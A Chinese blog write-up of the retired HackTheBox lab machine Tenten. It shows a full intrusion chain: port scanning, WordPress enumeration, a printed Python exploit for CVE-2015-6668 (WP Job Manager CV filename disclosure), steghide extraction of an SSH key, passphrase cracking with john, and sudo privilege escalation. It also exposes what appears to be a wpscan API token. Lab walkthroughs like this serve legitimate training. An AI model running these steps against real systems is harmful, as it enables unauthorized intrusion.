zoukankan      html  css  js  c++  java
  • HTB-靶机-Tenten

    本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

    靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.10

    nmap -sC -sV -p- -T5 10.10.10.10 -oN tenten.nmap

    nmap扫描结果

    就开了两个端口,看下Web应用,发现是个wordpress 点击了几个页面,发现下面这个

    点下那个Apply Now 到了如下页面

    得到上面的url地址:http://10.10.10.10/index.php/jobs/apply/8/ 其中最末尾是个数字,可以先探测下,这里可以使用burpsuite,wfuzz进行探测,我为了方便显示就使用shell脚本循环进行探测显示

    for i in $(seq 1 25); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i/ | grep 'entry-title' | cut -d'>' -f2 | cut -d'<' -f1; done

    发现了一个标题信息为HackerAccessGranted,这是个重要的提示信息,先放着,我们使用wpscan扫描下目标并枚举下存在哪些用户,在使用之前需要先在https://wpscan.com/ 注册下免费的账户,然后使用官方免费的api来获取漏洞信息,不然wpscan扫描不了任何漏洞信息,我这里已经注册好了,下面是扫描结果

    wpscan --url http://10.10.10.10 -e ap,t,tt,u --api-token pFokhQNG8ZFEmmntdfHfTYnrYdnvJHKtVtDuHTqTqBc

    发现一个插件漏洞可以探测出敏感信息,编号是CVE-2015-6668这里可以使用下面的exploit

    https://raw.githubusercontent.com/Johk3/HTB_Walkthrough/master/Tenten/disclosurevuln.py

    https://raw.githubusercontent.com/Jack-Barradell/exploits/master/CVE-2015-6668/cve-2015-6668.py   这个没测试成功

    import requests
    
    print """
    CVE-2015-6668
    Title: CV filename disclosure on Job-Manager WP Plugin
    Author: Evangelos Mourikis
    Blog: https://vagmour.eu
    Plugin URL: http://www.wp-jobmanager.com
    Versions: <=0.7.25
    """
    website = raw_input('Enter a vulnerable website: ')
    filename = raw_input('Enter a file name: ')
    
    filename2 = filename.replace(" ", "-")
    
    for year in range(2016,2018):
        for i in range(1,13):
            for extension in {'jpeg','txt','doc','pdf','docx'}:
                URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
                req = requests.get(URL)
                if req.status_code==200:
                    print "[+] URL of CV found! " + URL

    上面测试的结果:

    根据上面信息最终得出了图片文件地址:http://10.10.10.10//wp-content/uploads/2017/04/HackerAccessGranted.jpg

    同时上面wpscan扫描发现一个目标wordpress用户名,后面应该会用到,先放着

    访问http://10.10.10.10//wp-content/uploads/2017/04/HackerAccessGranted.jpg 并下载下来

    使用wget下载下来使用strings命令没查到有价值的信息,然后捣鼓了半天确认该图片使用了隐写术存放了隐藏文件,需要使用此命令 steghide 相关用法参考:https://blog.csdn.net/abc_12366/article/details/87098397

    steghide extract -sf HackerAccessGranted.jpg

    使用上面命令执行之后需要输入密码,尝试直接敲击回车使用空密码 登录上去了

    此时生成了文件id_rsa 查看一下该文件

    直接使用该文件进行ssh登录,用户就是上面wpscan扫描到的用户

    需要输入密钥的密码,没法了,使用john进行暴力破解了,破解之前先使用ssh2john转换为john能识别的形式

    python /usr/share/john/ssh2john.py id_rsa > bmfxcrack.txt

    破解出来密钥的密码是superpassword ,那么再次远程ssh登录目标靶机

    成功登录,执行了下sudo -l 可以提权的文件是fuckin  ,看下该文件是什么类型的,发现就是bash脚本,然后看下里面的内容,加了shell的位置变量,这就好办了,直接提权

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    From使用post与使用get区别
    HTML 自动跳转代码
    mjpgstreamer译文
    DOCUMENT.GETELEMENTBYID使用
    查看Linux内核版本的命令
    CGI编程学习5 穿插HTML,CSS零星知识
    使用Javascript显示时间
    北京大学<Perl 循序渐进>
    html之marquee详解
    Apache支持ASP.NET方法浅析
  • 原文地址:https://www.cnblogs.com/autopwn/p/13903471.html
Copyright © 2011-2022 走看看